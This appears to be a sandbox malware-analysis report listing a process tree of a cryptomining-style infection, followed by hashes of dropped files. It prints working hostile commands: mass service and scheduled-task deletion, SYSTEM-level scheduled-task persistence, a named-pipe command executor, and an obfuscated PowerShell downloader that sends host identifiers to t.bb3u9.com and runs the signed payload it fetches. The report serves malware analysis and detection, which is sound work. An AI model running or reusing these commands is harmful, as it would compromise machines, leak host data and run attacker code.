C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SxS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfy Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfya Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfyxxx Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config 360rTys Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config IPSECS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config MpeSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SRDSL Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WifiService Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ALGM Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApSrvs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApServs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config taskmgr1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WebServers Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WebServers5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WebServers5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ExpressVNService Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ExpressVNService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ExpressVNService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WWW.DDOS.CN.COM Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WWW.DDOS.CN.COM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WWW.DDOS.CN.COM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelpSvcs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelpSvcs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelpSvcs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config aspnet_staters Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop aspnet_staters5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete aspnet_staters5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config clr_optimization Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop clr_optimization5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete clr_optimization5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config AxInstSV Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop AxInstSV5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete AxInstSV5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Zational Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Zational5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Zational5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "DNS Server" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "DNS Server"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "DNS Server"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Serhiez Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Serhiez5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Serhiez5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SuperProServer Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SuperProServer5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SuperProServer5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ".Net CLR" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ".Net CLR"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ".Net CLR"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WissssssnHelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WissssssnHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WissssssnHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHasdadelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHasdadelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHasdadelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHasdelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHasdelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHasdelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ClipBooks Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ClipBooks5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ClipBooks5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN my1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ok /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java Update" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Microsoft Telemetry" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Spooler SubSystem Service" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Products Reporter" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for products" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN gm /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ngm /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Sorry /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Windows_Update /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update_windows /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN AdobeFlashPlayer /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN IIS /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsLogTasks /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "System Log Security Check" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update4 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DNS /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEM /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DNS2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEMa /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN skycmd /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Miscfost /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Netframework /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Flash /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN RavTask /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN GooglePingConfigs /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN HomeGroupProvider /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN MiscfostNsi /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WwANsvc /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Bluetooths /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Ddrivers /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsScan /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WebServers /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Credentials /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN TablteInputout /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN werclpsyport /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN HispDemorn /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN LimeRAT-Admin /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for Windows Service" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ECDnsCore /F5⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -anop TCP5⤵
- Gathers network information
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \hP9ntK /F /tr "powershell -c PS_CMD"3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \hP9ntK3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\2bcwf5oo\2bcwf5oo.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESFC0B.tmp" "c:\Windows\Temp\2bcwf5oo\CSC8E6015E52134C9E800F67490EACAF0.TMP"4⤵
-
\??\c:\windows\system32\cmd.exe/c powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
4d1a85f833e259570d88b53c1de297b9
SHA1e8347c3a2202989a6c7a55d721033165e6cfeb37
SHA256f188246e2ecea0bc8f9abdba17a2d46b62324ef8132d33a4bc6ed6a5ef0b438f
SHA512c9ed63db804b482d1a8e9f47c21b6ab697c749a822175b33e24475177978192e2de9cdb50e7c8c8e95b6c9663cf7666c95d66908259240338b5e9760594f1583
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
e48d09c785d76d8eab1fea4cec164a98
SHA16c90b089b909685e3d1068d74a27f6f1f6bd60d8
SHA2561bb9b019136a96f38872b5fd0cdc252461184b0fbe532e67e19b004e7709f7d2
SHA512729ffe5dc67462034e5eabb03bc51a1053005681790bd44fc7b28d3bcb153e60e05dd0f84726dd8e80ba729d587d7b07f66396ef8b587c248696d10e44088775
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\TEMP\2bcwf5oo\2bcwf5oo.dllMD5
3a1ef91e3edf8fd477ebb2eb36e4b690
SHA1573a867d2ae31ee99bbd537383cca8ba5b4925bf
SHA256f6b3439dad9bf4d713d274faf005d3485d4e7c9f132441e7b68121db85bb311d
SHA5125fc485a4a8cc6aa27b067ed7e1cb7d3ac45fcddda4f3b340847598f4911dfc8829c65cb295731562420fe8f8476aabe36ddfb1b7feaf1920d58217b9628640ef
-
C:\Windows\TEMP\RES279D.tmpMD5
b4787940fbd4cb18c6817b4fd1bb9814
SHA17acc5cdd623cec9eb2b24ba8f4163b25c7bf1e3e
SHA25673a48302d8fd6872ead592dfd719e49f010c4a4a971821aef61a1e900d302ecf
SHA5122ec8b245154ffc068e45859cfe11638a7aae376f57c2b417125cd1041b6d6805a569e107d903a1ed20475e333943c60861c99a83631491cbd8dc8a258bbf08d8
-
C:\Windows\TEMP\RES2F3B.tmpMD5
c25ae4c769b1df8b7780825e7d5758a6
SHA1e1bfdbd7b519ba51bfcff39e5ecf189cd5191572
SHA25689d63809ecf9634585cde2d43c64dbcde3ac268384cd975752bbe838302c0087
SHA5123b8c0825e25c520071a4b46759c892906fbd25a3c32e248e92e9f7a64b6301f8e932ac554e13ed34a7e56098ee28fd23c3d3e3172879c807c5095d11d0a88812
-
C:\Windows\TEMP\RESB7DA.tmpMD5
c652b83197b47d023ce875a06c59050a
SHA1579770cdf326d486c7f7712f736a09fba985adf3
SHA256a2a6ae918276a2c56cc82345e5069fdc862816b47422e80daf6b02332f669302
SHA5129272b1fc9fd637ac64b538d028058bff07bc3f255daaaf884733aa0093ba9a70ccc9f92ed4010c17ff691c863bd3a835e142be43fe8624c6374c84075d989625
-
C:\Windows\TEMP\RESD72D.tmpMD5
25d92886df713b6aa6d94938b7cc36f3
SHA132d7dff66cf33ff9a5955da684df8606f24dc79c
SHA256a80b215fb7d6ab4ff788349406e0f183a7e0c3e1bcdf5e404a3087ab081c93ae
SHA5126b259d0720996af375161e7034f2f8c25e9ac0650268602b1a3fc0c0d916a8d5f7021f9ffd364da2799bfa14da29e03e1d0c551e8f97d4a61a6cc86f3518d92a
-
C:\Windows\TEMP\RESFC0B.tmpMD5
c3f974d2bd947292d8150693f1c14591
SHA1edfac72d71ca096ff9f1088e244bddf66cdd2a3e
SHA2569c87e422260079b61fbc836cee91578754df62adcfccf466e13f10784de9b807
SHA512135cf24bc72e2d53d40afd3d8bc5c9dd5a6ad2053096c803ee5069a8a40c3be5e2c3f49f31ba7e1f22a2ef7c15d2f6d49fe63cb4f354fba896884e5056b5cbee
-
C:\Windows\TEMP\f5hj1zbh\f5hj1zbh.dllMD5
5c66bfa244aea83b3245152cf3a7957d
SHA11cb9d707a884369ac1a4da7e79a880985515a82e
SHA256e82df423ed029d3c30899b539e4777ebf7ae9b64ae8f54ac7e963a04d12f0683
SHA5123d748f6012546ff2f8d2855f661b6cba1116d25f02360f9be3202ae2ff85087c7605b9dd4d43eff6116e3eb4a9b511ec73973b08156bba02208389730c338a54
-
C:\Windows\TEMP\j3wn4yby\j3wn4yby.dllMD5
d50669cf6b76bc72e7465e14f110c3ac
SHA1564ce9cfcabea3e21509b8457b093009dbbf94a1
SHA25671ad8249a536e37e13c1545a199e19e0c0545c164ab872add5ee187dddfbd821
